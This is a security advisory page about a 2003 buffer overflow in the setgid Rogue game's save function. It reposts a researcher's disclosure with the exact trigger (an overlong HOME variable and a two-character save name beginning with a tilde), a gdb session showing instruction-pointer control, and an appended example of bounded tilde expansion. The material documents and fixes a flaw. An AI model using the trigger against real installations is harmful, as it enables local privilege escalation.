Category:   Application (Game)  >   Rogue
Vendors:   Stoehr, Tim et al
Rogue Game Software Buffer Overflow Lets Local Users Obtain Elevated Privileges
SecurityTracker Alert ID:  1006152
SecurityTracker URL:  http://securitytracker.com/id/1006152
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 23 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in the Rogue game software. A local user may be able to obtain additional privileges.

It is reported that the 'save game' feature contains a buffer overflow in the save_into_file() function in the 'save.c' file. A local user can reportedly set a specially crafted HOME environment variable and specify a file name that begins with a tilde ('~') when saving a game. Rogue will replace the tilde with the contents of the HOME environment variable without checking the length of the contents, according to the report.

A local user can overflow the buffer by filling the HOME environment variable with 111 characters and then saving a game with a file name that is two characters long (a tilde plus one additional character). Arbitrary code can be executed. Because the game is typically installed with set group id (setgid) 'games' group privileges, the local user can reportedly obtain 'games' group privileges.

Impact:   A local user can execute arbitrary code with 'games' group privileges.
Solution:   No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message [the patch is Base64 encoded].
Vendor URL:  ibiblio.org/pub/Linux/games/dungeon/!INDEX.html
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Rogue buffer overflow


---293465837-1442508392-1045861660=:12401
Content-Type: TEXT/PLAIN; charset=US-ASCII

Rogue buffer overflow


PROGRAM: Rogue
VENDOR: Tim Stoehr et al.
DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html
              (any file called "*rogue*" in that directory)
DMOZ/ODP: http://dmoz.org/Games/Video_Games/Roleplaying/Rogue-like/


DESCRIPTION:

Rogue is a text-based role-playing computer game with a long
history. It is the first of the rogue-like games.


SUMMARY:

Rogue's save game function (capital S) suffers from a buffer
overflow. The program is usually installed setgid games, so
successful exploitation means getting that group's access rights.


TECHNICAL DETAILS:

If you specify a file name for saving beginning with a tilde
(~), Rogue will replace that character with the contents of
the environment variable HOME. This happens in the function
save_into_file() in save.c. The concatenation of that environment
variable with the rest of the file name takes place in a buffer of
80 characters, and the code doesn't check if it is overrun or not.

We can exploit this by giving the HOME environment variable a value
that is 111 characters long, and by saving a game with a file name
that is two characters long: a tilde (~) and one more character. That
second character in the file name will be the highest byte in the
address that the processor jumps to. The other bytes in the address
come from the HOME environment variable.

Here is a session capture that illustrates this problem:

$ export HOME=`perl -e 'print "U" x 111;'`
$ gdb rogue
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/vsu/secwork/rogue/rogue

[rogue session snipped]

file name? ~A
~A-more-
problem accessing the save file
Program received signal SIGSEGV, Segmentation fault.
0x41555555 in ?? ()
(gdb) bt
#0  0x41555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax            0x1f     31
ecx            0x656c69 6646889
edx            0xff646b68       -10196120
ebx            0x4213030c       1108542220
esp            0xbfffdd90       0xbfffdd90
ebp            0x55555555       0x55555555
esi            0x40013020       1073819680
edi            0xbfffde84       -1073750396
eip            0x41555555       0x41555555
eflags         0x10286  66182


COMMUNICATION WITH VENDOR:

The program seems to be unmaintained, so I wrote an unofficial
patch instead.


MY PATCH:

I have attached a patch that corrects this problem. I have patched
against rogue985.


// Ulf Harnhammar
   VSU Security
   will audit PHP and Perl code for money
   ulfh@update.uu.se


---293465837-1442508392-1045861660=:12401
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rogue.patch"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0302212207400.12401@Tempo.Update.UU.SE>
Content-Description: 
Content-Disposition: attachment; filename="rogue.patch"

---293465837-1442508392-1045861660=:12401--
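
The report describes HOME being concatenated with the rest of the file name in an 80-character buffer with no length check. The following is an added example, not code from the report, its attached patch, or the Rogue source: a bounded tilde expansion that measures both parts first and rejects a result that does not fit, rather than truncating it (a truncated path would make a setgid program write to a file other than the one named). The names expand_save_name and NAME_BUF_LEN are hypothetical; only the 80-byte size and the 111-character HOME come from the report.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF_LEN 80   /* buffer size stated in the report */

/* Unbounded pattern the report describes, shown for contrast only:
 *     strcpy(buf, home);  strcat(buf, sfile + 1);
 * Hardened form: check lengths before any byte is copied. */

/* Expand a leading '~' in sfile using home (hypothetical helper).
 * Returns 0 on success, -1 if the result plus its NUL terminator
 * would not fit in out[outlen]; out is left empty on failure. */
int expand_save_name(const char *sfile, const char *home,
                     char *out, size_t outlen)
{
    const char *prefix = "";
    const char *rest = sfile;
    size_t plen, rlen;

    if (sfile == NULL || out == NULL || outlen == 0)
        return -1;
    if (sfile[0] == '~' && home != NULL) {
        prefix = home;       /* tilde replaced by HOME */
        rest = sfile + 1;    /* remainder of the file name */
    }
    plen = strlen(prefix);
    rlen = strlen(rest);
    /* Compare by subtraction so no sum can wrap around. */
    if (plen >= outlen || rlen >= outlen - plen) {
        out[0] = '\0';
        return -1;
    }
    memcpy(out, prefix, plen);
    memcpy(out + plen, rest, rlen + 1);   /* includes the NUL */
    return 0;
}

int main(void)
{
    char name[NAME_BUF_LEN];
    char long_home[112];

    /* Constructed input: the 111-character HOME from the report. */
    memset(long_home, 'U', 111);
    long_home[111] = '\0';
    printf("%d\n", expand_save_name("~A", long_home, name, sizeof name));
    printf("%d\n", expand_save_name("~/rogue.sav", "/home/u", name, sizeof name));
    return 0;
}
```

The caller should treat -1 as a failed save and report it to the user instead of falling back to the unexpanded name.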


 
 



Copyright 2019, SecurityGlobal.net LLC